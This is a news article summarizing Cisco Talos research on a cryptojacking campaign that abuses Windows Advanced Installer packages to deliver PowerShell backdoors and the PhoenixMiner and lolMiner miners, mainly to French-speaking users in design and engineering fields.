A recent cyber attack has primarily affected users in France and Switzerland, with some cases reported in other countries including the United States, Canada, Algeria, Sweden, Germany, Tunisia, Madagascar, Singapore, and even Vietnam.
According to analysis by Cisco’s Talos Intelligence, the attackers have been using a Windows tool to distribute cryptocurrency mining malware since November 2021. The attackers exploit Windows Advanced Installer, an application used by developers to package software installations, to execute malicious commands on infected machines.
The affected software installations are primarily related to 3D modeling and graphic design. Additionally, most of the software packages used in this malware campaign are written in the French language.
The investigation suggests that the victims span various industries, including architecture, engineering, construction, manufacturing, and entertainment in countries using the French language.
This illicit cryptocurrency mining campaign involves deploying PowerShell and Windows malicious scripts to execute commands and establish backdoors on victims’ machines. PowerShell is known for running in memory rather than on the hard drive, making it harder to detect an attack.
After setting up a backdoor, the attackers proceed to execute additional threats, such as the Ethereum cryptocurrency miners PhoenixMiner and lolMiner, both designed for multi-currency mining.
It’s worth noting that the use of malicious software to take control of devices for cryptocurrency mining, known as cryptojacking, involves installing cryptocurrency mining code on a device without the user’s knowledge or consent, resulting in unauthorized cryptocurrency mining.
Indications that malicious cryptocurrency mining software may be running on a device include overheating and sluggish performance.
Using malware groups to gain control of devices for mining or stealing cryptocurrency is not a new practice.
Recently, former smartphone giant BlackBerry identified malicious software scripts actively targeting at least three sectors, including financial services, healthcare, and government.